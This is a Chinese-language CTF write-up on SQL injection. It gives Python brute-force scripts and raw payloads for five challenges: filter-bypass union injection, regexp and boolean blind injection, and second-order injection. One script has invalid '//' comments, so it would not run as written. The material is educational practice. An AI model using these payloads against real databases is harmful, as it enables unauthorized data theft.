CTF中的SQL注入

1、**[NSSCTF 2022 Spring Recruit]babysql**:过滤空格的联合注入。最后的flag字段前几个是不可字符,需要结合substr函数进行处理。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import requests
import re

url="http://node1.anna.nssctf.cn:28132"
temp={"username":""}
s=""
for i in range(1,69):
    temp["username"]="2'/**/union/**/select/**/(select/**/substr(group_concat(flag),{},1)/**/from/**/flag)'".format(i)
    r1=requests.post(url=url,data=temp)
    r1=r1.text
    p=r'\"([^\"]*)\"[^\"]*$' //匹配最后一个""之间的内容。
    result=re.findall(p,r1)
    string=''.join(result)  //匹配的结果是列表,这里将其转换成字符串。
    print(string)
    s+=string
print(s)

2、**[NCTF 2019]SQLi*:regexp盲注。regexp:匹配正则表达式,例如:||/*/passwd/**/regexp/**/"^y” 意思是查询passwd字段是否有以y开头的字符串。就可以以此实现盲注。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import requests
import string
from urllib import parse

url="http://node4.anna.nssctf.cn:28680/"
s=string.digits+string.ascii_lowercase+"_"
passwd=''
for i in range(100):
    for j in s:
        temp={"username":"\\","passwd":"||/**/passwd/**/regexp/**/\"^{}\";{}".format((passwd+j),parse.unquote('%00'))}  #parse.unquote()用于将URL编码的字符串%00解码为普通的字符
        res=requests.post(url,data=temp)
        #print(res.text)
        if "welcome" in res.text:
            passwd+=j
            print(passwd)
            break
    if j=='_' and 'welcome' not in res.text:
        break
print(passwd)

3、**[October 2019]Twice SQL Injection**:注入点在注册界面的用户名。直接上脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
import requests
import re

url1='http://node4.anna.nssctf.cn:28998/?action=reg'
url2='http://node4.anna.nssctf.cn:28998/?action=login'
data1={"username":"admin' union select (select flag from flag)#","password":"1"}
r1=requests.post(url=url1,data=data1)
r2=requests.post(url=url2,data=data1)
#print(r2.text)
p=re.compile('<div>(.*?)</div>',re.S)
res=p.findall(r2.text)
res=''.join(res)
print(res)

4、**[UUCTF 2022 新生赛]ezsql**:对输入进行了倒序处理,且过滤了or。可以布尔盲注。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import requests
from urllib.parse import quote

url="http://node2.anna.nssctf.cn:28237/?user=&password="
global l
str1=''

for i in range(1,100):
    s="hardtoguess')+and+(length((select+UUCTF+frroom+UUCTF.flag))={})#".format(i)
    s=s[::-1]
    s=quote(s,safe='\'+)_')
    headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0"}
    r1=requests.get(headers=headers,url=url+s)
    #print(s)
    if "false" not in r1.text:
        l=i
        print(str(i))
        break
for i in range(1,l+1):
    for j in range(31,128):
        s="hardtoguess')+and+(ascii(substr((select+UUCTF+frroom+UUCTF.flag),{},1))={})#".format(i,j)
        s=s[::-1]
        s=quote(s,safe='\'+)') #新学到的知识点,quote方法进行url编码,safe后面的内容不编码。
        headers={"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0"}
        r1=requests.get(headers=headers,url=url+s)
        #print(r1.text)
        if "false" not in r1.text:
            #print(chr(j))
            str1+=chr(j)
            print(str1)
            if l==len(str1):
                print(str1)
                break

5、**[HNCTF 2022 WEEK2]easy_sql**:过滤了空格、information_schema.tables、and、注释。information_schema.tables用mysql.innodb_table_stats代替,schema_name用database_name代替。

1
2
3
4
5
6
7
1.1'union/**/select/**/1,2,database()/**/where/**/'1

1.1'union/**/select/**/1,2,group_concat(database_name)/**/from/**/mysql.innodb_table_stats/**/where/**/'1

1.1'union/**/select/**/1,2,group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/'1

1.1'union/**/select/**/1,2,group_concat(`1`)/**/from/**/(select/**/1/**/union/**/select/**/*/**/from/**/ctftraining.flag)b/**/where/**/'1

(持续更新中。。。)